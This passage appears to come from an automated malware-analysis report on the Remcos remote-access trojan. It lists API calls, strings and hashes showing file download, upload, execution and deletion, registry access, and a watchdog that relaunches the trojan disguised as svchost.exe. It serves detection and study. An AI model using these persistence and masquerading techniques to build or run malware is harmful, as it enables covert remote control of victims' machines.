                                              • Part of subcall function 013C27F5: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,013B464E,?,?,00000055), ref: 013C2817
                                              • Part of subcall function 013C27F5: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,013B464E,?,?,00000055), ref: 013C2821
                                              • Part of subcall function 013C27F5: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,013B464E,?,?,00000055), ref: 013C282B
                                              • Part of subcall function 013C27F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,00000055), ref: 013C2841
                                              • Part of subcall function 013C27F5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000055), ref: 013C284A
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 013B3D3D
                                              • Part of subcall function 013C2881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(013CBA38,013CBCB0,00000000,013B903C,013C40D8,00000000,0000000B), ref: 013C288D
                                              • Part of subcall function 013C2881: ??2@YAPAXI@Z.MSVCRT ref: 013C289B
                                              • Part of subcall function 013C2881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013C28BD
                                              • Part of subcall function 013C2881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 013C28DF
                                              • Part of subcall function 013C2881: ??3@YAXPAX@Z.MSVCRT ref: 013C28E6
                                              • Part of subcall function 013C2881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013C28F3
                                              • Part of subcall function 013C2881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013C28FC
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000001,00000000), ref: 013B3E6B
                                            • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 013B3E78
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Executing file: ,00000000,?,?,?,?), ref: 013B3E99
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Executing file: ,00000000,?,?,?,?), ref: 013B3EAA
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B3EBE
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000,00000000), ref: 013B3EE9
                                            • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,00000000), ref: 013B3EFA
                                            • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,-00000002,?,?,?,00000000), ref: 013B3F0E
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Browsing directory: ,00000000,?,?,?,00000000,?,?,?,00000000), ref: 013B3F2C
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Browsing directory: ,00000000,?,?,?,00000000,?,?,?,00000000), ref: 013B3F3D
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 013B3F51
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 013B3F5D
                                            • GetLogicalDriveStringsA.KERNEL32 ref: 013B3F74
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000064,?), ref: 013B3F8A
                                            • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP60(013C59C4,00000000,00000002), ref: 013B3F9C
                                            • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(00000001), ref: 013B3FA7
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 013B3FB6
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,Function_0001B310,00000000), ref: 013B3FD8
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,00000000), ref: 013B3FE2
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000051,?,?,?,?,?,00000000), ref: 013B3FFC
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 013B4008
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,Function_0001B310,00000000,00000002,Function_0001B310,00000000), ref: 013B4083
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000002,Function_0001B310,00000000), ref: 013B4093
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Function_0001B310,00000000), ref: 013B40A3
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Function_0001B310,00000000), ref: 013B40AD
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B40C8
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B40D4
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B40E0
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Expected file size: ,00000000), ref: 013B40FC
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,Expected file size: ,00000000), ref: 013B410E
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Downloading file: ,00000000,?,00000000,?,00000000,00000000), ref: 013B4148
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Downloading file: ,00000000,?,00000000,?,00000000,00000000), ref: 013B415A
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 013B416E
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 013B417A
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 013B4187
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 013B4342
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 013B4378
                                            • StrToIntA.SHLWAPI(00000000), ref: 013B437F
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001), ref: 013B43A2
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000055), ref: 013B470E
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000055), ref: 013B471F
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000055), ref: 013B4728
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$??1?$basic_string@$G@2@@std@@$??0?$basic_string@$V?$basic_string@$Hstd@@$D@2@@0@$D@1@@$?c_str@?$basic_string@$V01@@$V10@@$?length@?$basic_string@$V10@0@$File$V01@V12@$V10@$?substr@?$basic_string@FindG@2@@0@wcscpy$??4?$basic_string@?size@?$basic_string@CreateDirectoryG@1@@Y?$basic_string@wcscat$?begin@?$basic_string@?empty@?$basic_string@?find@?$basic_string@?resize@?$basic_string@?rfind@?$basic_string@A?$basic_string@FirstRemove$??2@??3@??8std@@??9std@@?append@?$basic_string@?data@?$basic_string@?end@?$basic_string@AttributesCloseDeleteDriveEventExecuteLocalLogicalNextShellStringsTime_itoa_wrenameatoiclosesocketprintfrecvsend
                                            • String ID: Browsing directory: $Deleted file: $Downloaded file size: $Downloaded file: $Downloading file: $Executing file: $Expected file size: $Failed to download file: $Failed to upload file: $Unable to delete: $Unable to rename file!$Uploaded file: $[DEBUG]$[ERROR]$[INFO]$open
                                            • API String ID: 1698304352-2559757301
                                            • Opcode ID: 2a7891abebff1ae1398fdf38814337a850e096b15c6d8ab16a4aa5045dc5466d
                                            • Instruction ID: 3c09e06756903043aa2a43e611786c6920118c4ef642c194b71aa69a5d2b5073
                                            • Opcode Fuzzy Hash: 2a7891abebff1ae1398fdf38814337a850e096b15c6d8ab16a4aa5045dc5466d
                                            • Instruction Fuzzy Hash: EB525C72A0021AAFDB15EBA4DC99EEF7B7CFB24705F440459F506A2184EF74BA44CB60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013BA5F5, Relevance: 87.7, APIs: 40, Strings: 10, Instructions: 222sleepCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetCurrentProcessId.KERNEL32 ref: 013BA5FE
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(013C6524,00000000), ref: 013BA611
                                              • Part of subcall function 013BB829: RegCreateKeyA.ADVAPI32(?,?,?), ref: 013BB836
                                              • Part of subcall function 013BB829: RegSetValueExA.ADVAPI32(?,00000004,00000000,00000004,?,00000004,00000000,?,013B9CDD,80000001,00000000), ref: 013BB851
                                              • Part of subcall function 013BB829: RegCloseKey.ADVAPI32(?,?,013B9CDD,80000001,00000000), ref: 013BB85C
                                            • OpenMutexA.KERNEL32 ref: 013BA63B
                                            • CloseHandle.KERNEL32(00000000), ref: 013BA64A
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Remcos restarted by watchdog!,?), ref: 013BA65E
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Watchdog module activated,?), ref: 013BA68C
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 013BA69C
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH,?), ref: 013BA6B6
                                              • Part of subcall function 013BB4C8: RegOpenKeyExA.KERNELBASE(80000001,013B8EBE,00000000,00020019,013B8EBE,?,?,?,013B8EBE,80000001,00000000,?,?,?,?,0000000E), ref: 013BB4E7
                                              • Part of subcall function 013BB4C8: RegQueryValueExA.KERNELBASE(013B8EBE,?,00000000,80000001,?,00000000,013CBCB0,?,?,?,013B8EBE,80000001,00000000), ref: 013BB505
                                              • Part of subcall function 013BB4C8: RegCloseKey.KERNELBASE(013B8EBE,?,?,?,013B8EBE,80000001,00000000,?,?,?,?,0000000E,013C5774), ref: 013BB510
                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 013BA6D4
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH), ref: 013BA6E2
                                              • Part of subcall function 013BB95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,origmsc), ref: 013BB96C
                                              • Part of subcall function 013BB95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(013B32A4,?), ref: 013BB97C
                                              • Part of subcall function 013BB95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B32A4,80000001), ref: 013BB993
                                              • Part of subcall function 013BB95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B32A4), ref: 013BB9AB
                                              • Part of subcall function 013BB95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013BB9C2
                                              • Part of subcall function 013BB95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013BB9CB
                                              • Part of subcall function 013BB95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BB9D4
                                              • Part of subcall function 013BB95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BB9DD
                                              • Part of subcall function 013BA8CE: OpenProcess.KERNEL32(00100000,00000000,?,80000001,?,013BA86F), ref: 013BA8DC
                                              • Part of subcall function 013BA8CE: WaitForSingleObject.KERNEL32(00000000,000000FF,?,013BA86F), ref: 013BA8E7
                                              • Part of subcall function 013BA8CE: CloseHandle.KERNEL32(00000000,?,013BA86F), ref: 013BA8EE
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\SysWOW64,?), ref: 013BA7A3
                                            • _wgetenv.MSVCRT ref: 013BA7B3
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 013BA7BE
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013BA7C9
                                            • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 013BA7D5
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013BA7DE
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013BA7E7
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Watchdog launch failed!,?), ref: 013BA882
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?), ref: 013BA896
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 013BA673
                                              • Part of subcall function 013C203B: GetLocalTime.KERNEL32(?), ref: 013C2052
                                              • Part of subcall function 013C203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,013C6BFC,?,013C5770,?,?,013B51EF,?), ref: 013C2087
                                              • Part of subcall function 013C203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,013B51EF,?), ref: 013C2094
                                              • Part of subcall function 013C203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,013B51EF,?), ref: 013C20A1
                                              • Part of subcall function 013C203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,013B51EF,?), ref: 013C20AE
                                              • Part of subcall function 013C203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,013B51EF,?), ref: 013C20B8
                                              • Part of subcall function 013C203B: printf.MSVCRT ref: 013C20BF
                                              • Part of subcall function 013C203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B51EF), ref: 013C20CB
                                              • Part of subcall function 013C203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B51EF), ref: 013C20D4
                                              • Part of subcall function 013C203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B51EF), ref: 013C20DD
                                              • Part of subcall function 013C203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B51EF), ref: 013C20E6
                                              • Part of subcall function 013C203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B51EF), ref: 013C20EF
                                              • Part of subcall function 013C203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B51EF), ref: 013C20F8
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 013BA709
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 013BA718
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 013BA72D
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\system32,?), ref: 013BA748
                                            • _wgetenv.MSVCRT ref: 013BA758
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 013BA763
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013BA76E
                                            • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 013BA77A
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013BA783
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013BA78C
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013BA7F0
                                            • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(\svchost.exe), ref: 013BA7FE
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(013CBD70), ref: 013BA80C
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 013BA816
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Watchdog module activated,?), ref: 013BA837
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 013BA84B
                                            • Sleep.KERNEL32(000007D0), ref: 013BA85E
                                            • CloseHandle.KERNEL32 ref: 013BA8AA
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013BA8B6
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BA8BF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@$?c_str@?$basic_string@$Hstd@@V?$basic_string@$CloseG@1@@$D@2@@0@Open$HandleProcessV01@V10@0@$??4?$basic_string@G@2@@0@V01@@V10@Value_wgetenv$CreateCurrentLocalMutexObjectQuerySingleSleepTimeV10@@WaitY?$basic_string@printf
                                            • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$[ERROR]$[INFO]$\SysWOW64$\svchost.exe$\system32
                                            • API String ID: 2208868093-2207663338
                                            • Opcode ID: 07daee52abed4f6e4ea82f0952f3d44ceb61622c0d0811f96eda58e694edaa34
                                            • Instruction ID: 5db6e0fb57eb81b805f50a94de5be8754e6153383039142b2af66ee80399f830
                                            • Opcode Fuzzy Hash: 07daee52abed4f6e4ea82f0952f3d44ceb61622c0d0811f96eda58e694edaa34
                                            • Instruction Fuzzy Hash: 217111B2A00109AFDB14ABA5DC4AEFE7F7CEF54705F400019F902D2148EB757A45CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013C0586, Relevance: 78.3, APIs: 52, Instructions: 279fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 013C0595
                                            • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6F525DF0), ref: 013C05AD
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(Function_0001B310), ref: 013C05BE
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 013C05CD
                                              • Part of subcall function 013C29EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C29FA
                                              • Part of subcall function 013C29EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A11
                                              • Part of subcall function 013C29EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5), ref: 013C2A27
                                              • Part of subcall function 013C29EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 013C2A45
                                              • Part of subcall function 013C29EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A4F
                                              • Part of subcall function 013C29EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A58
                                              • Part of subcall function 013C29EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A6D
                                              • Part of subcall function 013C29EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A7A
                                              • Part of subcall function 013C29EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2ACC
                                              • Part of subcall function 013C29EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2AD5
                                              • Part of subcall function 013C29EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2ADE
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,013CBFB8,013C5A24,00000000,00000001), ref: 013C0617
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,00000001), ref: 013C0624
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000001), ref: 013C062F
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000001), ref: 013C063B
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,00000000,00000001), ref: 013C0648
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,00000000,00000001), ref: 013C0655
                                              • Part of subcall function 013C2DDF: CreateFileW.KERNEL32(747DF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,747DF560,?,013B9C9F,00000000), ref: 013C2DF9
                                            • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,?,?,?,00000000,00000001), ref: 013C0679
                                            • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,00000000,00000001), ref: 013C068B
                                            • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,00000000,00000001), ref: 013C0694
